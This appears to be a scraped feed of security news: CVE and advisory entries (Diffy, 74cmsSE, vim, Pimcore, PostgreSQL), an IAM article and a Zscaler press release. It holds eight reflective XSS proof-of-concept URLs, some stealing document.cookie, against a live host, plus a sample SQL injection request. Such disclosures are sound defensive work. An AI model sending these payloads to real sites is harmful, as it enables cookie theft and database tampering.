The function that calls the diff tool in versions of Diffy prior to 3.4.1 does not properly handle double quotes in a filename when run in a Windows environment. This allows attackers to execute arbitrary commands via a crafted string.

**Improper handling of double quotes in file name in Diffy in Windows environment**

High severity GitHub Reviewed Published Jun 24, 2022 • Updated Jun 25, 2022

GHSA-5ww9-9qp2-x524: Improper handling of double quotes in file name in Diffy in Windows environment

The Bosch Ethernet switch PRA-ES8P2S with software version 1.01.05 runs its web server with root privilege. In combination with CVE-2022-23534 this could give an attacker root access to the switch.

CVE-2022-32535: Multiple Vulnerabilities PRA-ES8P2S Ethernet-Switch

74cmsSE v3.5.1 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /index/jobfairol/show/.

**Vulnerability name**：Reflective XSS  
**Date of Discovery**: 30/5/2022  
**Affected version**: 74cmsSE\_v3.5.1  
**Download link**: http://www.74cms.com/downloadse/show/id/68.html  
Vulnerability Description:  
The attack string is included as part of the crafted URI or HTTP parameters, improperly processed by the application, and returned to the victim.

Vulnerability location：Many places，Here are some places I found:  
Verification process：  
1、exp: http://124.223.95.129:8766/index/jobfairol/show/<%2Ftitle>1<ScRiPt>alert(document.cookie)<%2FScRiPt>

With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS

2、exp：http://124.223.95.129:8766/job/?"<ScRiPt>alert("xss");<%2FScRiPt>"=11  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

3、exp：http://124.223.95.129:8766/company/?"<ScRiPt>alert(1)<%2FScRiPt>"=11  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

4、exp：http://124.223.95.129:8766/company/view\_be\_browsed/total/d1/\_d1\_/?"<ScRiPt>alert(11)<%2FScRiPt>"=2  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

5、exp：http://124.223.95.129:8766/company/service/increment/add/im/d1/\_d1\_/d2/\_d2\_.html?"<ScRiPt>alert(123)<%2FScRiPt>"=world  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

6、exp: http://124.223.95.129:8766/company/account/safety/trade/?"<ScRiPt>alert(555)<%2FScRiPt>"=key  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

7、exp: http://124.223.95.129:8766/index/notice/show/<%2Ftitle>1<ScRiPt>alert(document.cookie)<%2FScRiPt>  
  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

8、exp: http://124.223.95.129:8766/company/down\_resume/total/nature/?"<ScRiPt>alert(11)<%2FScRiPt>"=page

  
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS  

Repair method：  
Filter the data according to the tags and attributes of the whitelist to clear the executable script (such as script tag, oneror attribute of img tag, etc.)

CVE-2022-32124: There are multiple reflective XSS vulnerabilities in this cms · Issue #3 · PAINCLOWN/74cmsSE-Arbitrary-File-Reading

The function that calls the diff tool in Diffy 3.4.1 does not properly handle double quotes in a filename when run in a windows environment. This allows attackers to execute arbitrary commands via a crafted string.

@@ -49,13 +49,7 @@ def diff \[string1, string2\] end  
if WINDOWS \# don't use open3 on windows cmd \= sprintf '"%s" %s %s', diff\_bin, diff\_options.join(' '), @paths.map { |s| %("#{s}") }.join(' ') diff \= \`#{cmd}\` else diff \= Open3.popen3(diff\_bin, \*(diff\_options + @paths)) { |i, o, e| o.read } end diff, stderr, process\_status \= Open3.capture3(diff\_bin, \*(diff\_options + @paths)) diff.force\_encoding('ASCII-8BIT') if diff.respond\_to?(:valid\_encoding?) && !diff.valid\_encoding? if diff =~ /\\A\\s\*\\Z/ && !options\[:allow\_empty\_diff\] diff \= case options\[:source\]

CVE-2022-33127: Remove windows specific exec.  Open2.capture3 should work on all · samg/diffy@478f392

totd before 1.5.3 does not properly randomize mesg IDs.

Authors: 

Philipp Jeitner, _Fraunhofer Institute for Secure Information Technology SIT, National Research Center for Applied Cybersecurity ATHENE;_ Haya Shulman, _Fraunhofer Institute for Secure Information Technology SIT, National Research Center for Applied Cybersecurity ATHENE, and Goethe-Universität Frankfurt;_ Lucas Teichmann, _Fraunhofer Institute for Secure Information Technology SIT;_ Michael Waidner, _Fraunhofer Institute for Secure Information Technology SIT, National Research Center for Applied Cybersecurity ATHENE, and Technische Universität Darmstadt_

BibTeX

@inproceedings {281372,  
title = {{XDRI} Attacks - and - How to Enhance Resilience of Residential Routers},  
booktitle = {31st USENIX Security Symposium (USENIX Security 22)},  
year = {2022},  
address = {Boston, MA},  
url = {https://www.usenix.org/conference/usenixsecurity22/presentation/jeitner},  
publisher = {USENIX Association},  
month = aug,  
}

CVE-2022-34295: XDRI Attacks - and - How to Enhance Resilience of Residential Routers

Buffer Over-read in GitHub repository vim/vim prior to 8.2.

@@ -1206,6 +1206,7 @@ cmdline\_insert\_reg(int \*gotesc UNUSED)

{

int i;

int c;

int save\_new\_cmdpos = new\_cmdpos;

**This comment has been minimized.**

Sign in to view

Copy link

****djklimes** Jun 22, 2022**

When I build this change with:  
./configure --with-features=tiny --enable-perlinterp=no --enable-pythoninterp=no --enable-python3interp=no --enable-rubyinterp=no --enable-luainterp=no --with-vim-name=vim-minimal --enable-gui=no  
make  
it fails with:  
ex\_getln.c:1209:35: error: ‘new\_cmdpos’ undeclared (first use in this function); did you mean ‘set\_cmdspos’?  
1209 | int save\_new\_cmdpos = new\_cmdpos;

  

#ifdef USE\_ON\_FLY\_SCROLL

dont\_scroll = TRUE; // disallow scrolling here

@@ -1224,8 +1225,6 @@ cmdline\_insert\_reg(int \*gotesc UNUSED)

#ifdef FEAT\_EVAL

/\*

\* Insert the result of an expression.

\* Need to save the current command line, to be able to enter

\* a new one...

\*/

new\_cmdpos = -1;

if (c == '\=')

@@ -1266,6 +1265,8 @@ cmdline\_insert\_reg(int \*gotesc UNUSED)

}

#endif

}

new\_cmdpos = save\_new\_cmdpos;

  

// remove the double quote

redrawcmd();

CVE-2022-2175: patch 8.2.5148: invalid memory access when using expression on comman… · vim/vim@6046ade

### Impact
Pimcore offers developers listing classes to make querying data easier. This listing classes also allow to order or group the results based on one or more columns which should be quoted by default. 
The actual issue is that quoting is not done properly in both cases, so there's the theoretical possibility to inject custom SQL if the developer is using this methods with input data and not doing proper input validation in advance and  so relies on the auto-quoting being done by the listing classes. 

##### Example: 
```php
// request url: https://example.com/foo?groupBy=o_id`; SELECT SLEEP(20);--

$list = new DataObject\Car\Listing();
$list->setOrderKey($request->get('orderBy'));
$list->setGroupBy($request->get('groupBy'));
$list->load();
```

### Patches
Upgrade to >= 10.4.4 or apply the following patch manually: 
https://github.com/pimcore/pimcore/commit/21559c6bf0e4e828d33ff7af6e88caecb5ac6549.patch

### Workarounds
Apply this patch manually: 
https://github.com/pimcore/pimcore/commit/21559c6bf0e4e828d33ff7af6e88caecb5ac6549.patch

### References
https://github.com/pimcore/pimcore/pull/12444


**Impact**

Pimcore offers developers listing classes to make querying data easier. This listing classes also allow to order or group the results based on one or more columns which should be quoted by default.  
The actual issue is that quoting is not done properly in both cases, so there's the theoretical possibility to inject custom SQL if the developer is using this methods with input data and not doing proper input validation in advance and so relies on the auto-quoting being done by the listing classes.

**Example:**

// request url: https://example.com/foo?groupBy=o\_id\`; SELECT SLEEP(20);--

$list = new DataObject\\Car\\Listing();
$list\->setOrderKey($request\->get('orderBy'));
$list\->setGroupBy($request\->get('groupBy'));
$list\->load();

**Patches**

Upgrade to >= 10.4.4 or apply the following patch manually:  
https://github.com/pimcore/pimcore/commit/21559c6bf0e4e828d33ff7af6e88caecb5ac6549.patch

**Workarounds**

Apply this patch manually:  
https://github.com/pimcore/pimcore/commit/21559c6bf0e4e828d33ff7af6e88caecb5ac6549.patch

**References**

pimcore/pimcore#12444

**References**

*   GHSA-gvmf-wcx6-p974
*   pimcore/pimcore#12444
*   pimcore/pimcore@21559c6

GHSA-gvmf-wcx6-p974: Improper quoting of columns when using setOrderBy() or setGroupBy() on listing classes in Pimcore

Treat identity management as a first-priority problem, not something to figure out later while you get your business up and running in the cloud.

Realizing the vast potential of the cloud enables organizations to innovate and undergo digital transformations. The last two years have demonstrated the importance of ensuring sound cybersecurity, especially as many enterprises have migrated to the cloud. A key part of the cloud, however, is ensuring that enterprises utilize proper identity management. Increased cloud adoption has resulted in a deluge of new human, and even non-human, identities that threat actors can compromise. Enterprises that don’t take this seriously can find themselves the latest victims of a breach.

One should look no further than Okta, a popular identity management platform used by many enterprises. Earlier this year, the Lapsus$ criminal organization claimed to be in possession of a super-user account at Okta. While the full extent of the breach isn't yet known, having these high-level credentials potentially means the criminal organization has the figurative "keys to the kingdom" regarding access, along with the ability to obtain the data of users who rely on the Okta platform. When an identity and access management (IAM) provider is the victim of an identity-based attack, you know that threat actors are playing hard.

That said, IAM isn't a new issue and will certainly become more important in the foreseeable future. A report from Cider Security ranked IAM as the second biggest problem in continuous integration/continuous delivery environments. These concerns relate to both the permissions granted to identities across an enterprise and ensuring that permissions are deprovisioned in a timely manner.

**Difficulties of Managing Identities in the Cloud**

Managing identities in the cloud is difficult due to a confluence of factors. Often the structure of a cloud provider's notions of projects and organizations don't map well to how an enterprise structures itself. This can lead to things like a single enterprise user trying to manage multiple "identities" within the cloud in order to do their job. Downstream, this results in few, if any, people having any real visibility into who has access to what within the cloud.

As problems like this grow, they're further exacerbated as the company hires employees and then experiences turnover. Also, moving from on-premises to the cloud can create similar challenges. Enterprises spend years operating in one way that works for them with their own hardware, and then as they move to the cloud, they need to adjust that older way of working to the cloud provider's structures.

**Consequences of Improperly Managed Identities**

From a security perspective, failure to properly manage IDs in the cloud opens up enterprises to a lack of command and control of who can do what within their infrastructure. It also makes it very difficult to recognize when something is askew with IDs or permissions for those identities.

From a non-security perspective, poorly managed identities can lead to friction in an enterprise's processes and then may lead to undesirable outcomes. These outcomes could include employees having to log in to cloud assets using multiple identities, or employees continually finding that they must request new permissions that they should have had from the outset. Ultimately, this slows down an enterprise's processes.

**Two Common IAM Missteps**

Customers regularly fail to build out cloud-based solutions where identity management is concerned. Ultimately, the cloud resources being accessed by identity holders don't care if you're a person, a machine, or a dog. If you have the right credentials, you're authenticated and authorized. Before they know it, a mission-critical service is running 24/7/365, and some key piece of that service is talking to other critical services via a human employee's identity. What happens when that employee leaves? Ensuring the continuity of services is imperative for enterprises and their identity and access management in the cloud.

Another potential pitfall comes with users sharing credentials. It doesn't take long for that key to get used without anyone having any capability to track down exactly who is really accessing the cloud resources. This lack of accountability can lead to big problems, including security concerns, for enterprises.

**How Organizations Can Mitigate Security Concerns**

First and foremost, treat identity management as a first-priority problem, not something to figure out later while you get your business up and running in the cloud. Create your own well defined policies on identity management with an eye toward ensuring the principle of least privilege, in which identities can only access what they need.

Don't let the tools from cloud providers determine how you run your business. A great way to ensure that your enterprise is in the driver's seat is to find people that know the cloud and know it well. Bringing in outside assistance from those who know it best not only puts it in the hands of those who are the most qualified to do so, but it can also help to mitigate common IAM problems that you may not even have on your radar. Additionally, it's important to gain organizationwide visibility into your cloud infrastructure. This valuable insight into your cloud infrastructure provides numerous benefits, not just for IAM but for compliance and financial management as well.

Getting a Better Handle on Identity Management in the Cloud

Enables DevOps and security teams to prioritize and remediate risks in cloud-native applications earlier in the development life cycle.

San Jose, California, June 22, 2022 / Las Vegas, Nevada, June 22, 2022

Zscaler, Inc. (NASDAQ: ZS), the leader in cloud security, today announced its new Posture Control™ solution, designed to give organizations unified Cloud-Native Application Protection Platform (CNAPP) functionality tailor-made to secure cloud workloads. Integrated into the Zscaler Zero Trust Exchange™, the Posture Control solution enables DevOps and security teams to efficiently prioritize and remediate risks in cloud-native applications earlier in the development lifecycle. The completely agentless solution correlates and prioritizes risks, such as unpatched vulnerabilities in containers and VMs, excessive entitlements and permissions, and cloud service misconfigurations.

“The cybersecurity landscape continues to evolve as more applications reside across multi-cloud footprints, making it more difficult than ever for security, IT, and DevOps teams to keep up with new types of attacks and efficiently prioritize and then remediate cloud risks,” said Amit Sinha, President, Zscaler. “Unlike point cloud security tools, which lack context and overburden operators with alerts while missing the full picture, Zscaler’s new Posture Control solution correlates signals across several cloud security disciplines to identify and prioritize real risk drivers and high priority security incidents. Also, by extending security directly into developer workflows, infosec teams can collaborate more effectively with DevOps teams to proactively secure applications earlier in the development lifecycle.”

Today, most enterprises are forced to implement and manage dozens of point security tools to achieve complete security coverage. These tools operate in silos and are not integrated, leading to visibility challenges, security gaps, and friction among cross-functional teams. However, due to the dynamic nature of the cloud, security risks are made up of a combination of several complex issues that are interconnected across multiple layers. To address them, security teams need a consolidated platform that prioritizes risk across all their cloud environments.

To meet the scale and speed required for cloud-native application development, organizations need a unified approach that envelops the entire Continuous Integration and Continuous Delivery (CI/CD) lifecycle, integrating seamlessly with developer and DevOps workflows. They also need a simplified architecture that correlates issues across multi-cloud environments to better identify high priority security risks and deliver remediation via each stakeholder’s preferred workflows earlier in the development process.

“As organizations increasingly move their applications to the cloud, security teams struggle to keep up with cloud-native development because multiple siloed tools create too many alerts that are difficult to manage and prioritize,” said Melinda Marks, Senior Analyst, Enterprise Strategy Group (ESG). “With its integrated approach, Zscaler’s Posture Control solution can help security and DevOps teams better identify, prioritize, and remediate risks. With solutions like this, organizations can focus on the top issues to greatly reduce their overall risk.”

Zscaler’s new Posture Control solution builds on the security capabilities of Zscaler’s proven Workload Communications solution, which is designed to secure cloud applications at runtime. Integrated with the Zscaler for Workloads service, the Posture Control solution and Workload Communications are combined to unify development and runtime security of cloud-native and VM-based applications running on any service in any cloud. The Posture Control solution delivers comprehensive coverage of all cloud environments in a singular view and a unified data model to enable security, IT, and DevOps teams to secure cloud apps without disrupting the development processes. Following are key features of the Posture Control solution:

*   **Advanced Threat and Risk Correlation:** Identify and assess the combination of multiple security issues that may appear to be low-risk individually, but have the potential to create larger, more malicious risks across cloud environments when combined. These correlated risks are unified in a singular view, giving security teams the context they need to properly explore and prioritize risks in the cloud.
*   **Agentless Workload Scanning:** Avoid developer friction and eliminate blind spots due to incomplete coverage of security tools with a 100% agentless, API-based approach. VMs and containers are scanned in both registries and in production environments, correlating vulnerabilities with other cloud weaknesses to prioritize actions based on risk rather than on CVSS score alone.
*   **Full Lifecycle Cloud Security:** Detect and resolve security issues early in the development phase before they become production incidents with “shift left” security. Zscaler monitors automated deployment processes and sends alerts when critical security issues are found.
*   **Risk and Compliance Visualizations Across the Entire Cloud:** Gain 360-degree visibility into risks across the entire multi-cloud footprint, including VMs, containers, and serverless workloads. Zscaler integrates with development platforms like VS Code, DevOps tools such as GitHub and Jenkins, and all major cloud providers to enable visibility and control “from build to run.”
*   **Simplified, Fast Deployment** **and Operations** - Zscaler and HashiCorp, a leader in multi-cloud infrastructure automation, have extended their integrations to secure cloud-native workloads in multi-cloud environments. The Posture Control solution can now easily scan infrastructure-as-a-code templates written in Terraform in the development environment. This shift-left approach provides the ability to build security in the CI/CD process, thereby reducing friction between development and security teams, and providing rapid application deployment and better security posture of cloud workloads.

For more details about Zscaler’s Posture Control solution, please see here.

About Zscaler  

Zscaler (NASDAQ: ZS) accelerates digital transformation so customers can be more agile, efficient, resilient, and secure. The Zscaler Zero Trust Exchange protects thousands of customers from cyberattacks and data loss by securely connecting users, devices, and applications in any location. Distributed across more than 150 data centers globally, the SSE-based Zero Trust Exchange is the world’s largest in-line cloud security platform.

Zscaler Launches Posture Control Solution

Red Hat Security Advisory 2022-5162-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: postgresql security update  
Advisory ID:       RHSA-2022:5162-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5162  
Issue date:        2022-06-22  
CVE Names:         CVE-2022-1552  
====================================================================  
1. Summary:

An update for postgresql is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

Security Fix(es):

* postgresql: Autovacuum, REINDEX, and others omit "security restricted  
operation" sandbox (CVE-2022-1552)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081126 - CVE-2022-1552 postgresql: Autovacuum, REINDEX, and others omit "security restricted operation" sandbox

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
postgresql-9.2.24-8.el7_9.src.rpm

x86_64:  
postgresql-debuginfo-9.2.24-8.el7_9.i686.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.x86_64.rpm  
postgresql-libs-9.2.24-8.el7_9.i686.rpm  
postgresql-libs-9.2.24-8.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
postgresql-9.2.24-8.el7_9.i686.rpm  
postgresql-9.2.24-8.el7_9.x86_64.rpm  
postgresql-contrib-9.2.24-8.el7_9.x86_64.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.i686.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.x86_64.rpm  
postgresql-devel-9.2.24-8.el7_9.i686.rpm  
postgresql-devel-9.2.24-8.el7_9.x86_64.rpm  
postgresql-docs-9.2.24-8.el7_9.x86_64.rpm  
postgresql-plperl-9.2.24-8.el7_9.x86_64.rpm  
postgresql-plpython-9.2.24-8.el7_9.x86_64.rpm  
postgresql-pltcl-9.2.24-8.el7_9.x86_64.rpm  
postgresql-server-9.2.24-8.el7_9.x86_64.rpm  
postgresql-static-9.2.24-8.el7_9.i686.rpm  
postgresql-static-9.2.24-8.el7_9.x86_64.rpm  
postgresql-test-9.2.24-8.el7_9.x86_64.rpm  
postgresql-upgrade-9.2.24-8.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
postgresql-9.2.24-8.el7_9.src.rpm

x86_64:  
postgresql-9.2.24-8.el7_9.x86_64.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.i686.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.x86_64.rpm  
postgresql-libs-9.2.24-8.el7_9.i686.rpm  
postgresql-libs-9.2.24-8.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
postgresql-9.2.24-8.el7_9.i686.rpm  
postgresql-contrib-9.2.24-8.el7_9.x86_64.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.i686.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.x86_64.rpm  
postgresql-devel-9.2.24-8.el7_9.i686.rpm  
postgresql-devel-9.2.24-8.el7_9.x86_64.rpm  
postgresql-docs-9.2.24-8.el7_9.x86_64.rpm  
postgresql-plperl-9.2.24-8.el7_9.x86_64.rpm  
postgresql-plpython-9.2.24-8.el7_9.x86_64.rpm  
postgresql-pltcl-9.2.24-8.el7_9.x86_64.rpm  
postgresql-server-9.2.24-8.el7_9.x86_64.rpm  
postgresql-static-9.2.24-8.el7_9.i686.rpm  
postgresql-static-9.2.24-8.el7_9.x86_64.rpm  
postgresql-test-9.2.24-8.el7_9.x86_64.rpm  
postgresql-upgrade-9.2.24-8.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
postgresql-9.2.24-8.el7_9.src.rpm

ppc64:  
postgresql-9.2.24-8.el7_9.ppc.rpm  
postgresql-9.2.24-8.el7_9.ppc64.rpm  
postgresql-contrib-9.2.24-8.el7_9.ppc64.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.ppc.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.ppc64.rpm  
postgresql-devel-9.2.24-8.el7_9.ppc.rpm  
postgresql-devel-9.2.24-8.el7_9.ppc64.rpm  
postgresql-docs-9.2.24-8.el7_9.ppc64.rpm  
postgresql-libs-9.2.24-8.el7_9.ppc.rpm  
postgresql-libs-9.2.24-8.el7_9.ppc64.rpm  
postgresql-plperl-9.2.24-8.el7_9.ppc64.rpm  
postgresql-plpython-9.2.24-8.el7_9.ppc64.rpm  
postgresql-pltcl-9.2.24-8.el7_9.ppc64.rpm  
postgresql-server-9.2.24-8.el7_9.ppc64.rpm  
postgresql-test-9.2.24-8.el7_9.ppc64.rpm

ppc64le:  
postgresql-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-contrib-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-devel-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-docs-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-libs-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-plperl-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-plpython-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-pltcl-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-server-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-test-9.2.24-8.el7_9.ppc64le.rpm

s390x:  
postgresql-9.2.24-8.el7_9.s390.rpm  
postgresql-9.2.24-8.el7_9.s390x.rpm  
postgresql-contrib-9.2.24-8.el7_9.s390x.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.s390.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.s390x.rpm  
postgresql-devel-9.2.24-8.el7_9.s390.rpm  
postgresql-devel-9.2.24-8.el7_9.s390x.rpm  
postgresql-docs-9.2.24-8.el7_9.s390x.rpm  
postgresql-libs-9.2.24-8.el7_9.s390.rpm  
postgresql-libs-9.2.24-8.el7_9.s390x.rpm  
postgresql-plperl-9.2.24-8.el7_9.s390x.rpm  
postgresql-plpython-9.2.24-8.el7_9.s390x.rpm  
postgresql-pltcl-9.2.24-8.el7_9.s390x.rpm  
postgresql-server-9.2.24-8.el7_9.s390x.rpm  
postgresql-test-9.2.24-8.el7_9.s390x.rpm

x86_64:  
postgresql-9.2.24-8.el7_9.i686.rpm  
postgresql-9.2.24-8.el7_9.x86_64.rpm  
postgresql-contrib-9.2.24-8.el7_9.x86_64.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.i686.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.x86_64.rpm  
postgresql-devel-9.2.24-8.el7_9.i686.rpm  
postgresql-devel-9.2.24-8.el7_9.x86_64.rpm  
postgresql-docs-9.2.24-8.el7_9.x86_64.rpm  
postgresql-libs-9.2.24-8.el7_9.i686.rpm  
postgresql-libs-9.2.24-8.el7_9.x86_64.rpm  
postgresql-plperl-9.2.24-8.el7_9.x86_64.rpm  
postgresql-plpython-9.2.24-8.el7_9.x86_64.rpm  
postgresql-pltcl-9.2.24-8.el7_9.x86_64.rpm  
postgresql-server-9.2.24-8.el7_9.x86_64.rpm  
postgresql-test-9.2.24-8.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:  
postgresql-debuginfo-9.2.24-8.el7_9.ppc.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.ppc64.rpm  
postgresql-static-9.2.24-8.el7_9.ppc.rpm  
postgresql-static-9.2.24-8.el7_9.ppc64.rpm  
postgresql-upgrade-9.2.24-8.el7_9.ppc64.rpm

ppc64le:  
postgresql-debuginfo-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-static-9.2.24-8.el7_9.ppc64le.rpm  
postgresql-upgrade-9.2.24-8.el7_9.ppc64le.rpm

s390x:  
postgresql-debuginfo-9.2.24-8.el7_9.s390.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.s390x.rpm  
postgresql-static-9.2.24-8.el7_9.s390.rpm  
postgresql-static-9.2.24-8.el7_9.s390x.rpm  
postgresql-upgrade-9.2.24-8.el7_9.s390x.rpm

x86_64:  
postgresql-debuginfo-9.2.24-8.el7_9.i686.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.x86_64.rpm  
postgresql-static-9.2.24-8.el7_9.i686.rpm  
postgresql-static-9.2.24-8.el7_9.x86_64.rpm  
postgresql-upgrade-9.2.24-8.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
postgresql-9.2.24-8.el7_9.src.rpm

x86_64:  
postgresql-9.2.24-8.el7_9.i686.rpm  
postgresql-9.2.24-8.el7_9.x86_64.rpm  
postgresql-contrib-9.2.24-8.el7_9.x86_64.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.i686.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.x86_64.rpm  
postgresql-devel-9.2.24-8.el7_9.i686.rpm  
postgresql-devel-9.2.24-8.el7_9.x86_64.rpm  
postgresql-libs-9.2.24-8.el7_9.i686.rpm  
postgresql-libs-9.2.24-8.el7_9.x86_64.rpm  
postgresql-plperl-9.2.24-8.el7_9.x86_64.rpm  
postgresql-plpython-9.2.24-8.el7_9.x86_64.rpm  
postgresql-pltcl-9.2.24-8.el7_9.x86_64.rpm  
postgresql-server-9.2.24-8.el7_9.x86_64.rpm  
postgresql-test-9.2.24-8.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
postgresql-debuginfo-9.2.24-8.el7_9.i686.rpm  
postgresql-debuginfo-9.2.24-8.el7_9.x86_64.rpm  
postgresql-docs-9.2.24-8.el7_9.x86_64.rpm  
postgresql-static-9.2.24-8.el7_9.i686.rpm  
postgresql-static-9.2.24-8.el7_9.x86_64.rpm  
postgresql-upgrade-9.2.24-8.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1552  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYrMEj9zjgjWX9erEAQj9sg/+JJTtnNpHK5fwayt4VFgiXyCwSfGVZ5Sq  
tvXRsOZWS6IyDLtZMLoh4QGPKGa3QxPZzMS8ANtQwv7zI/T5YaSvwE2ynJWsMWPq  
Keb8GKLzFTd1vHOYxD8YWmGsKBUJrXKZSbe6PmTVeIkVE4kJ8AGNUQhdGmrXWzo6  
KQeCjiG4pqxAYagoDLEKF3vI1K290cOghBFYk+N4zf2dtM0kU6fBn46XTOvNZyHK  
7B5j4Zh50PbZurxDxHlQh7cjSIVAg3WwHd/je2DpIWLBqycAmgS2KKmMapNv8eiw  
mwQucIzZ3cPYv8olGR5vAcOESLStDsivwgQgMaVWApOleFVn9la/UnQKQjhW7gum  
9kJTL0tdeu8lXMYdzdpDu9wmbigD5b/vwNStC0fxOadfTcTQ2HA0MR+W/H7xx0WH  
p8Pv5yGRwTDkVZCa5cMrd957h84BYbZTogSgpTzJYrj5+/rSfRBr4DDbFI5rfVzH  
GJ8RApH2qndPkq7AjqkQYg7w5x5a+rMzXXOMocvldo+XZamGOIkbjzGwNi5zKVOY  
LtBcQ8X1VnSFZK7ivHvvgyA7hTP0+EZEMuQZ3FyJKmZCaoFx4ikYTkbnpEiqgWyM  
BNPMQB25syypAvXovJY2RxEcLNaWLXLHxDZaI+NBPrRAUPWdPwrOxTaL4lROHTym  
DE8OJwR8B98=ncdG  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#perl